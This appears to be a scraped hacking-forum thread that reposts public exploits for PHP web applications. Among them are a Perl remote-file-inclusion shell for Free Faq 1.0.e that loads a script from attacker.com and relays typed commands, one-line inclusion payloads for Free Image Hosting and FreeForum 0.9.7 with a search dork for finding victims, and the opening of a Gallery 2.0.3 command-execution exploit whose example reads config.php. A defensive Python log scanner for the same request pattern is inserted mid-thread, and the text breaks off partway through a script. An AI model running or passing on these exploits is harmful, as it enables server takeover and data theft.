Code: in forum.php.
die($temp[1]);
}
//if you are here
echo "exploit failed ";
?>
Black_hat_cr(HCE)
Free Faq V 1.0.e Remote File Inclusion
Code:
#!/usr/bin/perl
##################################################################
###################################
# #
# Free Faq V 1.0.e #
# #
# Class: Remote File Inclusion Vulnerability #
# Date: 2006/10/19 #
# #
# Remote: Yes #
# #
# Type: high #
# #
# Site: http://www.axxess.ca/FreeFAQ/dl_axxess.php
# # #
##################################################################
###################################
use IO::Socket;
use LWP::Simple;
$cmdshell="http://attacker.com/cmd.txt"; # <====== Change This Line With Your Personal Script
print "\n";
"##################################################################
########\n";
print "# #\n";
print "# Free Faq V 1.0.e Remote File Inclusion Vulnerability #\n";
print "# Vul File: index.php #\n";
print "# Bug Found By : Ashiyane Corporation #\n";
print "# Email: Alireza Ahari Ahari[at]ashiyane.ir #\n";
print "# Web Site : www.Ashiyane.ir #\n";
print "# #\n";
"##################################################################
########\n";
if (@ARGV < 2)
{
print "\n Usage: Ashiyane.pl [host] [path] ";
print "\n EX : Ashiyane.pl www.victim.com /path/ \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$vul="index.php?faqpath="
print "Type Your Commands ( uname -a )\n";
print "For Exiit Type END\n";
print "<Shell> ";$cmd = <STDIN>;
while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host",
PeerPort=>"80") or die "Could not connect to
host.\n\n";
print $socket "GET ".$path.$vul.$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "<Shell> ";
$cmd = <STDIN>;
}
Black_hat_cr(HCE)
Free Image Hosting V1(Remote file include)
Exploit:
[server]/[path]/forgot_pass.php?AD_BODY_TEMP=con_c99
Finding victims:
http://www.google.com/search?hl=en&q oogle+Search
Black_hat_cr(HCE)
FreeForum 0.9.7 (fpath) Remote File Include Vulnerability
Business has been tough lately; here's a bug for you guys to get by on for now, and I'll make up for it when I have a nicer one.
Quote:
Trang 4-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
FreeForum 0.9.7 (fpath) Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by XORON(turkish hacker)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
URL: http://www.ezforum.de/downloads/Forum.zip (229kb)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Vuln Code: in forum.php
if(!isset($cfg_file))$cfg_file="config/config.inc.php";
if(!isset($fpath))$fpath=".";
if(!isset($getvar))$getvar='';
include("$fpath/lib/php/classes.php");
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit: /forum.php?cfg_file=1&fpath=http://sh3LL?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA, O.G,
Trang 5-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# milw0rm.com [2006-10-07]
navaro(HCE)
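Added example, not part of the original posts: a log check for the request pattern shared by the Free Faq (`faqpath`) and FreeForum (`fpath`) reports above, where a query parameter that reaches `include()` carries a remote URL instead of a local path. The log lines, addresses, the `example.invalid` host and the `allowed_params` argument are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a combined-log-format line: "METHOD target PROTOCOL".
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value starting with a URL scheme or PHP stream wrapper does not belong
# in a parameter that is meant to hold a local directory such as ".".
REMOTE = re.compile(r'^\s*(?:(?:https?|ftps?)://|(?:php|data|expect):)', re.I)

def rfi_findings(log_line, allowed_params=frozenset()):
    """Return [(path, param, value)] for parameters carrying a remote URL.

    allowed_params (an assumption of this example) names parameters that
    legitimately hold URLs, e.g. a post-login redirect target.
    """
    m = REQUEST.search(log_line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    findings = []
    # parse_qsl percent-decodes once, the same form PHP hands to the script.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name not in allowed_params and REMOTE.match(value):
            findings.append((target.path, name, value))
    return findings

def scan(lines, allowed_params=frozenset()):
    """Collect findings over many lines, keeping the client address."""
    hits = []
    for line in lines:
        client = line.split(" ", 1)[0]
        for path, name, value in rfi_findings(line, allowed_params):
            hits.append((client, path, name, value))
    return hits

# Constructed sample lines (documentation addresses, example.invalid host).
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Oct/2006:10:00:01 +0000] "GET /faq/index.php?faqpath=http://example.invalid/c.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [07/Oct/2006:10:00:02 +0000] "GET /forum.php?cfg_file=1&fpath=http%3A%2F%2Fexample.invalid%2Fx%3F HTTP/1.1" 200 812',
    '198.51.100.2 - - [07/Oct/2006:10:00:03 +0000] "GET /forum.php?fpath=. HTTP/1.1" 200 4096',
    '198.51.100.2 - - [07/Oct/2006:10:00:04 +0000] "GET /login.php?next=https://example.invalid/home HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG, allowed_params={"next"}):
        print(hit)
```

A hit on a `.php` endpoint that answered 200 is worth checking against the server's `allow_url_include` and `register_globals` settings, since the FreeForum code only takes `$fpath` from the request when the variable is not already set.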
Gallery 2 - Remote Commands Execution Exploit
Gallery <= 2.0.3 stepOrder[] Remote Commands Execution Exploit
Code:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Gallery <=2.0.3 \"stepOrder[]\" remote cmmnds xctn \r\n";
echo "by rgod rgod<AT>autistici<DOT>org \r\n";
echo "site: http://retrogod.altervista.org \r\n\r\n";
echo "-> works with register_globals = On and magic_quotes_gpc = Off \r\n";
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS \r\n";
echo "host: target server (ip/hostname) \r\n";
echo "path: path to gallery2 \r\n";
echo "user-pass: this exploit needs valid user credentials to upload a \r\n";
echo " watermark \r\n";
echo "cmd: a shell command \r\n";
echo "Options: \r\n";
echo " -p[port]: specify a port other than 80 \r\n";
echo " -P[ip:port]: specify a proxy \r\n";
echo "Examples: \r\n";
echo "php ".$argv[0]." localhost /gallery2/ user pass cat / /config.php \r\n";